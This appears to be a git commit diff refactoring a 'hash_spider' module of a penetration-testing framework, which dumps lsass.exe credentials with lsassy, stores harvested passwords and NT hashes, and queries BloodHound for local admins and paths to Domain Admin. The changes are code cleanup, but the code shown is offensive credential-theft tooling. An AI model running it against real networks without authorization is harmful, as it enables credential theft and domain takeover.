do some cleanup for hash_spider for #38

main
Marshall Hallenbeck 2023-09-22 09:56:04 -04:00
parent 76bf3be084
commit 2a5c01d6b6
1 changed files with 27 additions and 20 deletions

View File

@ -12,7 +12,6 @@ from lsassy.session import Session
from lsassy.impacketfile import ImpacketFile from lsassy.impacketfile import ImpacketFile
credentials_data = [] credentials_data = []
admin_results = []
found_users = [] found_users = []
reported_da = [] reported_da = []
@ -37,15 +36,15 @@ def neo4j_conn(context, connection, driver):
def neo4j_local_admins(context, driver): def neo4j_local_admins(context, driver):
global admin_results
try: try:
session = driver.session() session = driver.session()
admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts
context.log.success("Admins and PCs obtained.") context.log.success("Admins and PCs obtained")
except Exception: except Exception as e:
context.log.fail("Could not pull admins") context.log.fail(f"Could not pull admins: {e}")
exit() return None
admin_results = [record for record in admins.data()] results = [record for record in admins.data()]
return results
def create_db(local_admins, dbconnection, cursor): def create_db(local_admins, dbconnection, cursor):
@ -69,7 +68,7 @@ def create_db(local_admins, dbconnection, cursor):
if user not in admin_users: if user not in admin_users:
admin_users.append(user) admin_users.append(user)
for user in admin_users: for user in admin_users:
cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user]) cursor.execute("INSERT OR IGNORE INTO admin_users(username) VALUES(?)", [user])
dbconnection.commit() dbconnection.commit()
@ -113,7 +112,7 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d
if path: if path:
for key, value in path.items(): for key, value in path.items():
for item in value: for item in value:
if type(item) == dict: if isinstance(item, dict):
if {item["name"]} not in reported_da: if {item["name"]} not in reported_da:
context.log.success(f"You have a valid path to DA as {item['name']}.") context.log.success(f"You have a valid path to DA as {item['name']}.")
reported_da.append({item["name"]}) reported_da.append({item["name"]})
@ -147,6 +146,7 @@ class NXCModule:
self.reset = None self.reset = None
self.reset_dumped = None self.reset_dumped = None
self.method = None self.method = None
@staticmethod @staticmethod
def save_credentials(context, connection, domain, username, password, lmhash, nthash): def save_credentials(context, connection, domain, username, password, lmhash, nthash):
host_id = context.db.get_computers(connection.host)[0][0] host_id = context.db.get_computers(connection.host)[0][0]
@ -156,6 +156,7 @@ class NXCModule:
credential_type = 'hash' credential_type = 'hash'
password = ':'.join(h for h in [lmhash, nthash] if h is not None) password = ':'.join(h for h in [lmhash, nthash] if h is not None)
context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id) context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id)
def options(self, context, module_options): def options(self, context, module_options):
""" """
METHOD Method to use to dump lsass.exe with lsassy METHOD Method to use to dump lsass.exe with lsassy
@ -220,17 +221,23 @@ class NXCModule:
cred["lmhash"], cred["lmhash"],
cred["nthash"], cred["nthash"],
] not in credentials_unique: ] not in credentials_unique:
credentials_unique.append( credentials_unique.append([
[
cred["domain"], cred["domain"],
cred["username"], cred["username"],
cred["password"], cred["password"],
cred["lmhash"], cred["lmhash"],
cred["nthash"], cred["nthash"],
] ])
)
credentials_output.append(cred) credentials_output.append(cred)
self.save_credentials(context, connection, cred["domain"], cred["username"], cred["password"], cred["lmhash"], cred["nthash"]) self.save_credentials(
context,
connection,
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"]
)
global credentials_data global credentials_data
credentials_data = credentials_output credentials_data = credentials_output
@ -302,7 +309,7 @@ class NXCModule:
neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}" neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}"
driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False) driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)
neo4j_conn(context, connection, driver) neo4j_conn(context, connection, driver)
neo4j_local_admins(context, driver) admin_results = neo4j_local_admins(context, driver)
create_db(admin_results, dbconnection, cursor) create_db(admin_results, dbconnection, cursor)
initial_run(connection, cursor) initial_run(connection, cursor)
context.log.display("Running lsassy") context.log.display("Running lsassy")